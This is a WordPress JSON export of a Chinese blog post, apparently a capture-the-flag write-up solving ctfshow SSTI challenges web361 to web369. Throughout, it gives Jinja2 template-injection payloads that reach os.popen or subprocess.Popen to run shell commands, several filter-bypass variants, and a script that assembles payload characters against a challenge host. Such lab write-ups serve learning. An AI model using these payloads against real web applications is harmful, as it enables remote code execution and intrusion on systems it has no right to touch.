{"id":109,"date":"2026-05-22T20:36:23","date_gmt":"2026-05-22T12:36:23","guid":{"rendered":"https:\/\/mdhei.xyz\/?p=109"},"modified":"2026-06-09T18:21:44","modified_gmt":"2026-06-09T10:21:44","slug":"ctfshow-ssti","status":"publish","type":"post","link":"https:\/\/mdhei.xyz\/index.php\/2026\/05\/22\/ctfshow-ssti\/","title":{"rendered":"ctfshow ssti"},"content":{"rendered":"\n<h2 id=\"web361\" class=\"wp-block-heading\">web361<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6839\u636e\u9898\u76ee\u63d0\u793a\u53c2\u6570\u5e94\u8be5\u662fname<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().__<strong>class<\/strong>__.__<strong>base__<\/strong>.__<strong>subclasses<\/strong>__()[185].<strong>__init__<\/strong>.__<strong>globals<\/strong>__.__<strong>builtins<\/strong>__[<a href=\"\">&#8216;eval&#8217;]<\/a>(&#8216;<strong>import<\/strong>(&#8220;os&#8221;).popen(&#8220;cat \/flag&#8221;).read()&#8217;)}}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__class__\u83b7\u53d6\u5f53\u524d\u5bf9\u8c61\u7684\u7c7b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__base__\u83b7\u53d6\u76f4\u63a5\u7236\u7c7b\uff0c\u8fd9\u91cc\u5c31\u662fobject\u7c7b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__subclasses__()\u83b7\u53d6\u5168\u90e8\u5b50\u7c7b\uff0c\u53d6\u3010185\u3011\uff0c\u8fd9\u91cc\u662f<code>&lt;class 'warnings.catch_warnings'&gt;<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__init__\u521d\u59cb\u5316\u5bf9\u8c61\u51fd\u6570<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.__globals__\u51fd\u6570\u5bf9\u8c61\u7684\u4e00\u4e2a\u5c5e\u6027\uff0c\u91cc\u9762\u4fdd\u5b58\u8fd9\u4e2a\u51fd\u6570\u5b9a\u4e49\u65f6\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">__builtins__ 
\u56e0\u4e3a__globals__\u83b7\u53d6\u7684\u662f\u5f53\u524d__init__\u51fd\u6570\u6240\u5728\u6a21\u5757\u7684\u547d\u540d\u7a7a\u95f4\uff0c\u5927\u6982\u7387\u4e0d\u5305\u542beval\u8fd9\u79cdpython\u5185\u7f6e\u51fd\u6570\uff0c\u800c__globals__\u5185\u6709\u4e00\u4e2a__builtins__\u5bf9\u5e94\u7684\u5c31\u662fPython \u7684\u5185\u7f6e\u540d\u5b57\u96c6\u5408\uff0c\u91cc\u9762\u5c31\u5305\u542beval<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u53d6\u51fa[&#8216;eval&#8217;]\u6267\u884c(&#8216;<strong>import<\/strong>(&#8220;os&#8221;).popen(&#8220;cat \/flag&#8221;).read()&#8217;)\u8bfb\u53d6\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc.__builtins__\uff0c\u8be2\u95eeai\u7684\u65f6\u5019\u544a\u8bc9\u6211\u5e94\u8be5\u662f\u4f5c\u4e3a\u4e00\u4e2a\u952e\u6765\u7528\u7684\uff0c\u5e94\u8be5\u662f[&#8216;__builtins__&#8217;]\uff0c\u5c1d\u8bd5\u4e86\u4e24\u79cd\u60c5\u51b5\u90fd\u53ef\u4ee5\u5f97\u51fa\u7ed3\u679c\uff0c\u8fd8\u4e0d\u660e\u767d\u662f\u4e3a\u4ec0\u4e48\u3002\uff08\u539f\u56e0\uff1aJinja2 \u4e2d <code>a.b<\/code> \u4f1a\u5148\u5c1d\u8bd5 <code>getattr(a, 'b')<\/code>\uff0c\u53d6\u4e0d\u5230\u5c5e\u6027\u65f6\u518d\u56de\u9000\u5230 <code>a['b']<\/code>\uff1b<code>__globals__<\/code> \u662f\u5b57\u5178\uff0c\u6ca1\u6709 <code>__builtins__<\/code> \u5c5e\u6027\uff0c\u6240\u4ee5\u56de\u9000\u4e3a\u6309\u952e\u53d6\u503c\uff0c\u4e24\u79cd\u5199\u6cd5\u7ed3\u679c\u76f8\u540c\u3002\uff09<\/p>\n\n\n\n<h2 id=\"web362\" class=\"wp-block-heading\">web362<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u548c\u4e0a\u9898\u4e00\u6837\uff0c\u6216\u8005\u4f7f\u7528subprocess.Popen()<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().<strong>class<\/strong>.<strong>mro<\/strong>[1].<strong>subclasses<\/strong>()[407](&#8220;cat \/flag&#8221;,shell=True,stdout=-1).communicate()[0]}}<\/p>\n\n\n\n<h2 id=\"web363\" class=\"wp-block-heading\">web363<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fc7\u6ee4\u4e86\u5355\u53cc\u5f15\u53f7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">?name={{().__<strong>class<\/strong>__.__<strong>mro__<\/strong>[1].__<strong>subclasses__<\/strong>()[<a href=\"request.args.a,shell=True,stdout=-1\">407<\/a>](request.args.a,shell=True,stdout=-1).communicate()[0].decode()}}&amp;a=cat \/flag<\/p>\n\n\n\n<h2 id=\"web364\" class=\"wp-block-heading\">web364<\/h2>\n\n\n\n<pre 
class=\"wp-block-code\"><code>name={{().__class__.__base__.__subclasses__()&#91;132].__init__.__globals__&#91;request.args.a](request.args.b).read()}}&amp;a=popen&amp;b=cat \/flag\n\n\n\u548c\u4e0a\u4e00\u9898request.args\u4e0d\u540c\u7684\u662f\uff0c\u8fd9\u91cc\u7684value\u5305\u62ecget\u548cpost\u4e24\u79cd\u53c2\u6570<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0a\u5185\u5bb9\u53ef\u80fd\u4f1a\u6709\u9057\u6f0f\u6216\u9519\u8bef\uff0c\u6b22\u8fce\u7559\u8a00\u6307\u6b63\u3002<\/p>\n\n\n\n<h2 id=\"web365\" class=\"wp-block-heading\">web365<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{().__class__.__base__.__subclasses__().__getitem__(407)(request.values.a,shell=True,stdout=-1).communicate().__getitem__(0)}}&amp;a=cat \/flag\n\u7528__getitem__\u7ed5\u8fc7\u4e2d\u62ec\u53f7\u8fc7\u6ee4\n\n\n<\/code><\/pre>\n\n\n\n<h2 id=\"web366\" class=\"wp-block-heading\">web366<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{(lipsum | attr(request.values.b)).os.popen(request.values.a).read()}}&amp;a=cat \/flag&amp;b=__globals__\n\u4e0b\u5212\u7ebf\u8fc7\u6ee4\uff0c\u7528  \u5bf9\u8c61 | \u8fc7\u6ee4\u5668 \u8bed\u6cd5\u7ed5\u8fc7\uff0c \u8fd9\u91cc\u5c31\u662f\u53d6lipsum\u7684__globals__\u5c5e\u6027\n<\/code><\/pre>\n\n\n\n<h2 id=\"web367\" class=\"wp-block-heading\">web367<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={{(lipsum | attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&amp;a=__globals__&amp;b=os&amp;c=cat \/flag\nos\u88ab\u8fc7\u6ee4\uff0c\u7528get()\u7ed5\u8fc7<\/code><\/pre>\n\n\n\n<h2 id=\"web368\" class=\"wp-block-heading\">web368<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>?name={%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&amp;a=__globals__&amp;b=os&amp;c=cat \/flag\n\n\u8fd9\u91cc\u6709\u4e2a\u8bed\u6cd5\u53d8\u5316\n{{ ... }}\uff1a\u8868\u8fbe\u5f0f\u8f93\u51fa\uff08\u81ea\u52a8 print\uff09\n{% ... 
%}\uff1a\u8bed\u53e5\u6267\u884c\uff08\u9700\u8981\u624b\u52a8 print\uff09 \u7ed5\u8fc7{{request}}\n\n\n<\/code><\/pre>\n\n\n\n<h2 id=\"web369\" class=\"wp-block-heading\">web369<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">{%%}\u4e2d\u8fc7\u6ee4\u4e86request<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528config\u6587\u672c\u7684\u5b57\u7b26\u62fc\u63a5payload<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u811a\u672c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\ndef getpayload(payload):\n    result = \"\"\n    for j in payload:\n        for i in range(1000):\n            r = requests.get(url=\"http:\/\/e49b08f8-d479-408d-9984-601ca9cd0e08.challenge.ctf.show\/?name=\"+\"{\"+\"% print(config|string|list).pop({}).lower()%\".format(i)+\"}\")\n            location = r.text.find(\"&lt;h3>\")\n            part = r.text&#91;location+4:location+5]\n            if part.lower() == j:\n                result += \"(config|string|list).pop({0}).lower()\".format(i)\n                print(result)\n                break\n    print(result)\nif __name__ == \"__main__\":\n    getpayload(\"cat \/flag\")\n    print(\"\/\/\/\")\n    getpayload(\"__globals__\")\n    print(\"\/\/\/\")\n    
getpayload(\"os\")\n\npayload\u5982\u4e0b\n\nhttps:\/\/e49b08f8-d479-408d-9984-601ca9cd0e08.challenge.ctf.show\/?name={%print(lipsum|attr((config|string|list).pop(74).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(6).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(2).lower()~(config|string|list).pop(33).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(42).lower()~(config|string|list).pop(74).lower()~(config|string|list).pop(74).lower())).get((config|string|list).pop(2).lower()~(config|string|list).pop(42).lower()).popen((config|string|list).pop(22).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(23).lower()~(config|string|list).pop(7).lower()~(config|string|list).pop(279).lower()~(config|string|list).pop(4).lower()~(config|string|list).pop(41).lower()~(config|string|list).pop(40).lower()~(config|string|list).pop(6).lower()).read() %}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>web361 \u6839\u636e\u9898\u76ee\u63d0\u793a\u53c2\u6570\u5e94\u8be5\u662fname ?name={{().__class__.__base__.__ 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-109","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/comments?post=109"}],"version-history":[{"count":8,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109\/revisions"}],"predecessor-version":[{"id":135,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/109\/revisions\/135"}],"wp:attachment":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/media?parent=109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/categories?post=109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/tags?post=109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}